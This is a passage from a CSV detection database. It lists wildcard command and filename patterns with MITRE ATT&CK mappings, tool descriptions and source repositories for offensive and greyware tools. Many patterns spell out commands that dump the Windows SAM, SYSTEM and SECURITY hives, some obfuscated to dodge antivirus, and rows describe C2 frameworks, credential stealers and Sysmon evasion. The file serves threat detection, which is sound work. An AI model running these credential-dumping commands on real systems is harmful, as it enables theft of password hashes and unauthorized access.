risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query hklm\software\realvnc*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query hklm\software\realvnc\Allusers*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query hklm\software\realvnc\Allusers\vncserver*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query hklm\software\realvnc\vncserver*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg save ""HK""L""""M\s""""a""""m"""" win32.dll*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg save ""HK""L""""M\s""""ys""""t""em"" win32.exe*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg save ""HK*L*M\s*ec*u*rit*y*"" update.exe*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*reg save hklm\sam *.dat*","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\sam to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg save hklm\sam 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg save HKLM\SAM c:*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg save hklm\sam sam*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg save hklm\system *.dat*","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\system to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg save hklm\system 1337*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*reg save HKLM\SYSTEM c:*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg save hklm\system system*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*reg.exe save HKLM\SAM sam_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*reg.exe save hklm\sam*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*reg.exe save HKLM\SECURITY security_*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*reg.exe save hklm\security*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*reg.exe save HKLM\SYSTEM sys*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*reg.exe save hklm\system*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*reg.py *@* save -keyName 'HKLM\SAM*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*reg.py *@* save -keyName 'HKLM\SECURITY*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*reg.py *@* save -keyName 'HKLM\SYSTEM*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*reGeorg-master*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" +"*reGeorgSocksProxy.py*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" +"*register-python-argcomplete --no-defaults exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*registry_hijacking_eventvwr*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*registry_hijacking_fodhelper*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*RegistryImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*registry-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RegistryTinker.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*RegReeper.7z*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.cpp*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.exe*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.sln*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*RegReeper.vcxproj*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*Reg-Restore-Persistence-Mole-main*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*regsvr32.exe /s /n /u /i: * scrobj.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*regsvr32_command_delivery_server*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reinstall_original_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*rekallreader.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*relay*/utils/enum.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RelayPackets.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Release of BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*REM Title: Harvester_OF_SORROW*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*RemAdm*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword for remote administration tools ","T1021 - T1027 - T1046 - T1057 - T1068 - T1072 - T1078 - T1135 - T1485 - T1489 - T1497 - T1547","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*remiflavien1/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*remiflavien1/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*-remote -destPipe * -pipeHost * -destHost *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Remote/lastpass/lastpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Remote/shspawnas*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Remote/suspendresume/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*remote_exploit.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - 